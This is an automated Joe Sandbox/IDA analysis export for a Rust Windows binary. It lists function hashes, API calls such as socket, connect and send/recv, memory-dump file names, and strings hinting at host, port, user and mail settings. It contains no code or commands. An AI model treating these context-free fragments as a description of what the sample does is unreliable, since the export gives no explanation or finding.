                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: 0x0X
                                            • API String ID: 3510742995-830206304
                                            • Opcode ID: 505c21de923338595ee4801078ffd45dc2197573395dd073a1de22dfc5432d95
                                            • Instruction ID: 70449affb8af9b786511a78ab92ce5fcf3fe13af1a7a7d4ec4c01c2f13e1b0bf
                                            • Opcode Fuzzy Hash: 505c21de923338595ee4801078ffd45dc2197573395dd073a1de22dfc5432d95
                                            • Instruction Fuzzy Hash: 4B418B36B04B5489E7148BA1E8907EC3774FB58768F584635DA9DA3B94DF389156C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorLast$recvsend
                                            • String ID:
                                            • API String ID: 1444173311-0
                                            • Opcode ID: c6c9b0e85feb04516d03b76c6651c8f3d755995235add29e82e9a84e1c3c9d7d
                                            • Instruction ID: b7ef91fd5626e93e94fa79505393dd773091f0935c55d26a62081c798f2b7c60
                                            • Opcode Fuzzy Hash: c6c9b0e85feb04516d03b76c6651c8f3d755995235add29e82e9a84e1c3c9d7d
                                            • Instruction Fuzzy Hash: 0F31AF75A0C68185EE285A269CE02BA5760FF457E0F5C0272FE6DAB7D5CE3CD042C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 7aa1aba65db73a99e912b31755ab8e54c7ff2e561b638271afb233d0777c3e1e
                                            • Instruction ID: 28a459cb7322c3a78a17233b793937460194ff7020cb33d4ed28b0f1062d1930
                                            • Opcode Fuzzy Hash: 7aa1aba65db73a99e912b31755ab8e54c7ff2e561b638271afb233d0777c3e1e
                                            • Instruction Fuzzy Hash: 50313722A09A8281EA159F22D8E43FD2361FF85FE4F4D4176CE1DA72E5DE39E845C350
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: e00172f01fb8d8ead8c016a656333ac0a207cdf826f95bbb1b49bf6946badb90
                                            • Instruction ID: 17089d2cd1546d819d905c40354883dadad31a605f36235d39f1f28113428ec1
                                            • Opcode Fuzzy Hash: e00172f01fb8d8ead8c016a656333ac0a207cdf826f95bbb1b49bf6946badb90
                                            • Instruction Fuzzy Hash: 81315822A09A8281EA159F22D4A43FD2361FF85FE4F4D4572CE1DA72E5CE39E445C350
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: b6d96907975d7a921be6e0d0036191bdbf651ea1565e0c035418e87081a048d7
                                            • Instruction ID: 32c0d3c10327ac9b13099eec956e7759cce20b1535a4096f2ed6f91bb83a45cd
                                            • Opcode Fuzzy Hash: b6d96907975d7a921be6e0d0036191bdbf651ea1565e0c035418e87081a048d7
                                            • Instruction Fuzzy Hash: 0B313A22A09A8280E715DF22D8A43FD2361EF85FE4F4D4576CE1DA72E6DF399445C350
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: d417f1b1bdc34fd3b8f8e5489fbc7a43f0d4d2cf1b94ac0d06fe342edd187ac4
                                            • Instruction ID: 2dc89b50b481ddddf356a8bde365e9a29a84d3451a0d11d8cf11b613ae684a4e
                                            • Opcode Fuzzy Hash: d417f1b1bdc34fd3b8f8e5489fbc7a43f0d4d2cf1b94ac0d06fe342edd187ac4
                                            • Instruction Fuzzy Hash: F5213E22A0994180E645DF26D8E43FD2361FF85BE4F8D4572CE1DA62E5DF399486C350
                                            APIs
                                            • HeapFree.KERNEL32(?,?,?,?,00007FF65451CF31,?,?,?,00007FF65439AB7E,?,?,?,00007FF6543992F5,?,?,?), ref: 00007FF65451CFAD
                                            • HeapFree.KERNEL32(?,?,?,?,00007FF65451CF31,?,?,?,00007FF65439AB7E,?,?,?,00007FF6543992F5,?,?,?), ref: 00007FF65451CFC4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: f00b2f651c0a2ba18ee8b834bab30d6c5b58bce58e7c26c1a777969ba2e967d8
                                            • Instruction ID: 29f9b1677c5fd128505ee2d84e47321eebf408e95408b32bfeb62044918c1734
                                            • Opcode Fuzzy Hash: f00b2f651c0a2ba18ee8b834bab30d6c5b58bce58e7c26c1a777969ba2e967d8
                                            • Instruction Fuzzy Hash: C1017916E0560682F6229B27E4D03BD6370EF88B95F595872CF4EA7784DF2DE4D69300
                                            APIs
                                            • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000004,?,00007FF654519B8F,?,?,?,00007FF654519B78), ref: 00007FF654519C66
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 6bb708161dd00cf3957cd540edbcd17a0ba48c03df0140382fab742cdffaf1a7
                                            • Instruction ID: 287bceaff4844c9c90d3c9e36bf488cf4c8953db0ce52a06ef511861dcc89079
                                            • Opcode Fuzzy Hash: 6bb708161dd00cf3957cd540edbcd17a0ba48c03df0140382fab742cdffaf1a7
                                            • Instruction Fuzzy Hash: 5521BDA6A09B8584EB14CB56D0A02FC3BB1FB89F88F0884B6DEDC63755DF28C104C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: d9cfd07b100c68657c9ec62c66bcab25a0663fc0d9a24f2c032fe4ef675673b2
                                            • Instruction ID: 0f546c1a0cc63ca8be5923c4c9340c3e64f9aa66bcbcd4d8b5bd499be7209496
                                            • Opcode Fuzzy Hash: d9cfd07b100c68657c9ec62c66bcab25a0663fc0d9a24f2c032fe4ef675673b2
                                            • Instruction Fuzzy Hash: 20018022A09B4294EB05DB26E4E03FD23A1AF45798F8C4476CE0DA77A5DF7CD188D340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeapmemcmp
                                            • String ID: char$charset$rset$utf-8
                                            • API String ID: 3299494168-1306876737
                                            • Opcode ID: 117b2b7c9b3b240fd9b70e0c3bc29d78c1787a9d079e4e7f082269bd3be64faf
                                            • Instruction ID: 3403916ce096b6f0b1afab1c1fa153f0d50b86af50f24d87658686ba2c9e6645
                                            • Opcode Fuzzy Hash: 117b2b7c9b3b240fd9b70e0c3bc29d78c1787a9d079e4e7f082269bd3be64faf
                                            • Instruction Fuzzy Hash: 2BC20422A4DAC181EE668B17D0A47FA6764FF44B84F895072DE5DA37A1EF3CE585C300
                                            APIs
                                            Strings
                                            • task was cancelledtask panickedassertion failed: snapshot.is_complete()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\harness.rs, xrefs: 00007FF6543A4436
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FreeHeap$closesocket$connectgetsockoptioctlsocketmemcpysocket
                                            • String ID: task was cancelledtask panickedassertion failed: snapshot.is_complete()C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\task\harness.rs
                                            • API String ID: 2018102388-2937751923
                                            • Opcode ID: 96183e28dfdf80e1c11f7646a9fd298f2a35e3609c26eb62da04edd943b2338f
                                            • Instruction ID: 9c77a99311a94275f089146fc0b350e094da5f027caee30355fc1d38666e6d37
                                            • Opcode Fuzzy Hash: 96183e28dfdf80e1c11f7646a9fd298f2a35e3609c26eb62da04edd943b2338f
                                            • Instruction Fuzzy Hash: 37727032508AC182EA768B26E4953EAB3A0FF98744F084175CBDD937A5EF7DE185D700
                                            APIs
                                            Strings
                                            • cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF65452AC40
                                            • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF65452ABA1
                                            • assertion failed: end >= start && end <= len, xrefs: 00007FF65452ABC3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: end >= start && end <= len$called `Result::unwrap()` on an `Err` value$cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs
                                            • API String ID: 3298025750-2816111376
                                            • Opcode ID: e7a987c4a92a958c705c20c1a131de3f8d92fbee8da3f5041c289e5c2d09a1de
                                            • Instruction ID: 99457003df1aee296e9deebea5067d50242b24fa9ea591cf7adfa5c5cc97a7ae
                                            • Opcode Fuzzy Hash: e7a987c4a92a958c705c20c1a131de3f8d92fbee8da3f5041c289e5c2d09a1de
                                            • Instruction Fuzzy Hash: 4AB2F762A0DBC681EA61CB15E8A53BA63A0FF85794F484276DE9DA37D5DF3CE444C300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeapmemcpy$memcmpmemset
                                            • String ID: host not$mail not found$ot found$ot found$ot found$ot found$port not$sub not $user not
                                            • API String ID: 4057583900-3981461617
                                            • Opcode ID: 2fbd45d806bb7b796409759265be766da3fbcbc5663b55b3bacee5f71b765385
                                            • Instruction ID: 064e4e3531b1c5f06498660d3ba6799eed2e7f73e170ff9a91d7c4d780eba67d
                                            • Opcode Fuzzy Hash: 2fbd45d806bb7b796409759265be766da3fbcbc5663b55b3bacee5f71b765385
                                            • Instruction Fuzzy Hash: 50524D22608BC185EB758B22E4A43EAB7A2FB45744F584175CBDE937A5DF3CE188C701
                                            APIs
                                            Strings
                                            • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba, xrefs: 00007FF6544F4594, 00007FF6544F47DF
                                            • 0x0X, xrefs: 00007FF6544F4721, 00007FF6544F4971
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Value$FreeHeap$AllocCompleteInitOnce
                                            • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba$0x0X
                                            • API String ID: 471168871-3601239808
                                            • Opcode ID: 9387971a1972f53ebb30cb8d64137977b023e149ccb94fa899e3b0a7c1c84399
                                            • Instruction ID: e47cb17ee289ca80321cbf1bafe13fce07926a013ede769364f446152448747f
                                            • Opcode Fuzzy Hash: 9387971a1972f53ebb30cb8d64137977b023e149ccb94fa899e3b0a7c1c84399
                                            • Instruction Fuzzy Hash: 54125822F59A9156EB248B15D4A07BC2361FF65BA0F4C4275DE2EA3BD9DF3CA441D300
                                            APIs
                                            Strings
                                            • tv, xrefs: 00007FF6543B5247
                                            • assertion failed: prevC:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.30\src\stream\futures_unordered\mod.rs, xrefs: 00007FF6543B4F9D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: assertion failed: prevC:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.30\src\stream\futures_unordered\mod.rs$tv
                                            • API String ID: 3510742995-3351431354
                                            • Opcode ID: b83c8560f3bd27acb2118ce4452637645bae00caa221cc3496d92c427d67a1cb
                                            • Instruction ID: 24e0e2401a763e7e2717732a04d547e3c5c9759058b6444eb8338407135b831f
                                            • Opcode Fuzzy Hash: b83c8560f3bd27acb2118ce4452637645bae00caa221cc3496d92c427d67a1cb
                                            • Instruction Fuzzy Hash: D2829D32A09F8181EB60CB16E0A43BE73A0FB94B84F484575DA9DA77A9DF3DE045D344
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$ErrorFreeFrequencyHeapLastPerformanceQuery
                                            • String ID: assertion failed: curr.is_join_interested()$assertion failed: prev.ref_count() >= 1$overflow when adding duration to instantlibrary\std\src\time.rs
                                            • API String ID: 3045614229-1047842113
                                            • Opcode ID: 4a7854a053cb1a321c8cfac1166c609c2e98a58abfd627d5b6095a204c9a98d1
                                            • Instruction ID: b3caaed7c30d5af3180b62e59fc45664b1ef362066fa63f7d9530c3beed7faef
                                            • Opcode Fuzzy Hash: 4a7854a053cb1a321c8cfac1166c609c2e98a58abfd627d5b6095a204c9a98d1
